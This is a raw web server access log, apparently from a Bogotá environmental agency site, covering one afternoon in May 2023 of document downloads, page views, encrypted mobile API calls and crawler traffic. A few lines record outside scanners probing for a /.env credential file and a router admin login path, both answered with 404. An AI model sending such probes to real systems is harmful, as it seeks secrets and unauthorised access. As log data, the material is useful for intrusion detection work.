172.22.2.4 - - [13/May/2023:14:28:43 -0500] "GET /BLA/boletinlegal/Directivas/2015/Directiva%20No.%2001%20del%2014%20de%20Enero%20de%202015.pdf HTTP/1.1" 200 1416322
172.22.2.4 - - [13/May/2023:14:28:44 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1492
186.102.61.112 - - [13/May/2023:14:29:04 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+FxTk8wSs0tJHtygJCRAHI+cPzMWzDSyTh7ljUoizyIlFLEtb9R+a6bkx3BV1G9tkRut9jNwl3wgRO8/ym7wgBRwDp00n53KEU1bQMN6iWARrFTvxpnlW1XB1ZQTKO4HyKah36Xjjn47gYR2GIbjsnXkqbJT5iAqTaZ+5hu1v9mgOVgP2F6VOgYJMqsA3Srvc9paO7jgNTm5D5NnscHRleXTO9+yjvu/2hwhRSqQ61NNga/55kk9oxVoRGF3JjmiF0l9u+x4qtrw==&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:14:29:05 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:14:29:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/LnbohL1S+3Bjkc1st0ua4lB2OWHj1JAC02/6HgbB9POOqNYv2Cgp+qD1yLI2BTpt5U0ggO6+atB7iLpF2De3pr68+tq10kq5nCP2g3FDH17pHpKWrXTzuxX8bfc80sqztg9sU19px4Jo902wtNxnF8syaby51zno=&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:14:29:05 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/+MlvFBAGEOIihkVmKSH1Cps8BPM7YAEO99m5cyIjpPB9ZVYhBQ9e0mCs22GqtFTGgB4Sn+57k4fvyx9NrGtRFVQNpL2lWFGmUe9BDMelIE1Rf4OwV6cWoNGM/cCEUJ21i6L2w8Sqi/3T4XIYEyyS9zJBqpI+AxpM=&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:14:29:06 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18L/1/t1xbqtpRLgqG3PSMWIRUYUZ3bW/iZ7OZ8RoBhkkbTABwy7Zl09Dt+4Cz2Kcbq5Z8/Gt0Mqx3dL3z3bSDOaNhr7QuRDKj4dxWbYMxgJGCHZ++la427wSnylO7NJJwmg7jz9ZfjxdqJaDTUjgZ4dvFuubEkNak=&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:14:29:06 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX18dgucFveJRnOIEPE49iLmbfhwnbhj1oPgSkJnm3jcUL5sOz+SmPszPpjUNZ//pWFkny3g6/H/jgUZlKXhqsg+MY9fn0/m/S+xAqLVQVaEL0iC2RIUCGF6hdXo4XJy88T83mviSks0hSI9Qe0rwKODOZou1DShkxK7WEhFsl/HJqnTcqUWCUXhq&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
201.245.192.253 - - [13/May/2023:14:29:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40068
201.245.192.253 - - [13/May/2023:14:29:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44128
172.22.2.4 - - [13/May/2023:14:28:06 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.146 - - [13/May/2023:14:29:50 -0500] "GET /Autoliquidacion/index.php?dir=TR%C1MITES+AGUAS+SUPERFICIALES%2F HTTP/1.1" 200 2647
207.46.13.219 - - [13/May/2023:14:30:06 -0500] "GET /Autoliquidacion/dlf/styles.css HTTP/1.1" 200 3045
172.22.2.4 - - [13/May/2023:14:28:57 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
201.245.192.253 - - [13/May/2023:14:30:43 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [13/May/2023:14:32:54 -0500] "HEAD / HTTP/1.1" 200 -
168.119.253.6 - - [13/May/2023:14:35:26 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [13/May/2023:14:33:56 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [13/May/2023:14:35:41 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:14:34:47 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57151
216.245.221.92 - - [13/May/2023:14:37:54 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.211 - - [13/May/2023:14:38:35 -0500] "GET /BLA/resoluciones/AUTOS%202021/3384.pdf HTTP/1.1" 304 -
201.245.192.253 - - [13/May/2023:14:39:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 40068
201.245.192.253 - - [13/May/2023:14:39:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 44128
201.245.192.253 - - [13/May/2023:14:40:40 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:14:39:46 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:14:40:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
216.245.221.92 - - [13/May/2023:14:42:54 -0500] "HEAD / HTTP/1.1" 200 -
40.77.167.146 - - [13/May/2023:14:43:30 -0500] "GET /BLA/resoluciones/AUTOS%202013/2809.pdf HTTP/1.1" 200 241772
173.252.95.19 - - [13/May/2023:14:44:22 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
173.252.87.21 - - [13/May/2023:14:44:58 -0500] "GET /images/caminatas-ecol\xc3\xb3gicas-marzo---1920x1080_optimized.jpg HTTP/1.1" 404 1034
201.245.192.253 - - [13/May/2023:14:45:39 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
66.249.64.33 - - [13/May/2023:14:46:14 -0500] "-" 408 -
181.51.24.86 - - [13/May/2023:14:46:53 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
172.22.2.4 - - [13/May/2023:14:45:36 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.245.221.92 - - [13/May/2023:14:47:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:14:46:27 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
186.168.152.103 - - [13/May/2023:14:48:59 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
201.245.192.253 - - [13/May/2023:14:50:38 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
216.245.221.92 - - [13/May/2023:14:52:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:14:51:26 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:14:52:17 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
172.22.2.4 - - [13/May/2023:14:53:58 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1037
172.22.2.4 - - [13/May/2023:14:53:58 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-046-99.docx HTTP/1.1" 304 -
186.102.62.215 - - [13/May/2023:14:55:08 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
201.245.192.253 - - [13/May/2023:14:55:36 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
193.42.32.124 - - [13/May/2023:14:57:12 -0500] "POST /boaform/admin/formLogin HTTP/1.1" 404 1186
69.171.231.2 - - [13/May/2023:14:57:53 -0500] "GET /secretaria-de-ambiente-libero-19-animales-silvestres-en-bogota-en-el-humedal-torca-y-guaymaral.html HTTP/1.1" 206 904
216.245.221.92 - - [13/May/2023:14:57:54 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:14:57:17 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
80.29.190.30 - - [13/May/2023:14:59:03 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
80.29.190.30 - - [13/May/2023:14:59:04 -0500] "GET /favicon.ico HTTP/1.1" 404 1382
172.22.2.4 - - [13/May/2023:14:58:08 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 56287
172.22.2.4 - - [13/May/2023:15:00:00 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/AnalisisC-746-12.docx HTTP/1.1" 304 -
186.102.61.112 - - [13/May/2023:15:00:11 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19EtES9GkLtAa9DRJmGaIzNvWciMir8H3eFHaRQAfmG9rtoFREkih3zbGNVHBlO4o8uja1/yrlOby2uh3qF8d+9ZIDdDW/vxN6gwG0zS40mt/Oy4VXhrqKDMYwfIz8ps1D45odFFOqb51FRxzgTFWGyUzUbQpfKQH8Ya4O9EHBRIcRae8huRAlaN5NSF9Az6sGDCSaUuIK4Q6n2F7dLh3oDVm74yBUJb8wckd89icfixXILyy8eWFpz7tY1nr2fclG5dPwmtfg1+Q==&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:15:00:12 -0500] "GET /kwssiamovil/sm/acme/a?s=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&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:15:00:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/pcyVMHrSgUzLRB3nj1EIQAJ35uRxZQyrj+9iFI3VU6aMAZEG1XpMBJ0STU/UH5NWL1E0YnZ8FZOuFEJAWjThLjZMBc25QcCtz0NjQASThVDRfXHniwqgHQ16l2KzxTcGNMdmP6VKK+gaM8dVAfB9lzMjsZRUKmPY=&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:15:00:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX188C/yqceUzc0EX7KlQWJnd4RMnBfgd3zlrl47sU9kHyr6LXp4ZW4hQXYX9tE9L4rL3lBru280btnh3ZBH0zOGXVuA4c7OlF86tAvqY26brivdRRPSl5u2MwF1Fc6hoBfXDrtRdc7p8pLV2ZHOhFAMpfNEBmXsutGw=&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:15:00:12 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX19Y2wHZqzeZUpPl7hVf7kZYMjsKFXpl/13n+6oZ4eo4j1QEXP/MeKuUTC+7YH/RnxRs1CieW2wHj1KZPyjBjNoRx8KnDDxvEw7AU5Y+ZgHD8ImansJpnI2dNHSy1c9ZXI5ANk/d3LJ2P53tKfoY3DHEZv/FHRYAFa8=&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.102.61.112 - - [13/May/2023:15:00:13 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+bRsMhWUfn3YDdAU43+fYITuDoJEpW0spzKYk3Wp3oeiIPcW9cI7bJm1WHkwvBDai8q2g4FGJA/LaE7jno+oZVsnYGPpcYqCXkT8NjAW3cOy/VLrwhjk9Vw9lY+mNnMc/I19ZIPrkRWKdfdU0Fwg+FeZE+D1QMZmQhIzUV7zAisEXElz6EOw+W&u=U2FsdGVkX1/MPHBqcwkocYVl3x8NXj4Owg9ieMX9cVY=&y=U2FsdGVkX1/PO/dUUv8zfHq0+7lsvhBkB/ANHO4mtnv/wQz2LKe29SN8HI04HjWT HTTP/1.1" 200 26
186.144.242.10 - - [13/May/2023:15:00:34 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
201.245.192.253 - - [13/May/2023:15:00:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
94.102.49.193 - - [13/May/2023:15:01:02 -0500] "-" 408 -
198.235.24.42 - - [13/May/2023:15:02:48 -0500] "GET / HTTP/1.0" 200 319
216.245.221.92 - - [13/May/2023:15:02:54 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.219 - - [13/May/2023:15:04:29 -0500] "GET /Publicaciones/2023EE64636.pdf HTTP/1.1" 404 227
172.22.2.4 - - [13/May/2023:15:03:07 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
207.46.13.211 - - [13/May/2023:15:05:17 -0500] "GET /Publicaciones/2023EE73017.pdf HTTP/1.1" 404 227
172.22.2.4 - - [13/May/2023:15:04:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
201.245.192.253 - - [13/May/2023:15:05:34 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:15:03:58 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 55571
31.13.103.21 - - [13/May/2023:15:06:19 -0500] "GET /con-actividade HTTP/1.1" 404 1034
31.13.103.21 - - [13/May/2023:15:06:19 -0500] "GET /con-actividade HTTP/1.1" 404 1034
31.13.103.118 - - [13/May/2023:15:06:20 -0500] "GET /con-actividade HTTP/1.1" 404 1034
31.13.103.6 - - [13/May/2023:15:06:20 -0500] "GET /con-actividade HTTP/1.1" 404 1034
216.245.221.92 - - [13/May/2023:15:07:54 -0500] "HEAD / HTTP/1.1" 200 -
20.83.166.48 - - [13/May/2023:15:09:26 -0500] "GET /.env HTTP/1.1" 404 1018
20.83.166.48 - - [13/May/2023:15:09:27 -0500] "POST / HTTP/1.1" 200 319
186.28.132.107 - - [13/May/2023:15:10:30 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
201.245.192.253 - - [13/May/2023:15:10:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 43465
172.22.2.4 - - [13/May/2023:15:08:57 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [13/May/2023:15:09:48 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59306
181.58.39.26 - - [13/May/2023:15:11:28 -0500] "GET /secretaria-de-ambiente-adelanta-rehabilitacion-de-un-tayra-mamifero-entregado-en-bogota.html HTTP/1.1" 200 786
179.19.95.218 - - [13/May/2023:15:11:53 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
179.19.95.218 - - [13/May/2023:15:11:53 -0500] "GET /BLA/boletinlegal/js/jquery.scrollShow.js HTTP/1.1" 200 4586
179.19.95.218 - - [13/May/2023:15:11:53 -0500] "GET /galeria/galeria/jquery.fancybox.js?v=2.1.5 HTTP/1.1" 200 48706
179.19.95.218 - - [13/May/2023:15:11:56 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.css HTTP/1.1" 200 2066
179.19.95.218 - - [13/May/2023:15:11:56 -0500] "GET /galeria/carrusel/Carrusel/jquery-ui-1.8.13.custom.min.js HTTP/1.1" 200 10800
179.19.95.218 - - [13/May/2023:15:11:56 -0500] "GET /galeria/carrusel/Carrusel/jquery.thumbnailScroller.js HTTP/1.1" 200 8157
179.19.95.218 - - [13/May/2023:15:11:56 -0500] "GET /galeria/nivo-slider/demo/banner.html HTTP/1.1" 200 5446
179.19.95.218 - - [13/May/2023:15:11:56 -0500] "GET /galeria/nivo-slider/demo/scripts/jquery-1.7.1.min.js HTTP/1.1" 200 93868
179.19.95.218 - - [13/May/2023:15:11:56 -0500] "GET /galeria/nivo-slider/themes/default/default.css HTTP/1.1" 200 1569
179.19.95.218 - - [13/May/2023:15:11:56 -0500] "GET /galeria/nivo-slider/jquery.nivo.slider.pack.js HTTP/1.1" 200 11561
179.19.95.218 - - [13/May/2023:15:11:56 -0500] "GET /galeria/nivo-slider/themes/pascal/pascal.css HTTP/1.1" 200 2258
